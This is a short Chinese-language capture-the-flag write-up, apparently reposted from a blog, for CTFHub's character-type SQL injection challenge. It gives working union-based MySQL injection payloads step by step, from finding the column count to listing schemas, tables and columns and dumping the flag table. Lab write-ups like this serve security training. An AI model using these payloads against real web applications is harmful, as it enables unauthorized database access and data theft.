CTFHUB—SQL注入—字符型注入
作者:互联网
1.输入1‘测试,发现报错
输入' and 1=1测试,无法注入
输入1’and 1=1 -- 注意:--后面有空格
输入'and 1=2 -- ,报错
因此判断,该url为字符型注入
2.判断列数,输入1' order by 3 -- '
输入1' order by 2 -- '
因此字段数是2
3.判断信息是第几列, ' union select 1,2 -- '
4.查询用户, ' union select 1,user() -- ',查询结果为:root用户
5.访问数据库, ' union select 1,version() -- '
根据数据库版本得知,为MySQL的一个分支
6.查询当前数据库名称, ' union select 1,database() -
数据库名称为sqli
7.获取数据库名称, ' union select 1,group_concat(schema_name) from information_schema.schemata -- '
查询得知,当前数据库为: information_schema,mysql,performance_schema,sqli
8.查询表名 ' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '
得知,sqli库中有两个表:flag、news
8.查询列名
' union select table_name,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '
9.查看指定数据库指定表的列的内容
' union select 1,group_concat(flag) from sqli.flag -- '
标签:sqli,CTFHUB,--,SQL,table,注入,union,select,schema 来源: https://www.cnblogs.com/chensicha/p/15525195.html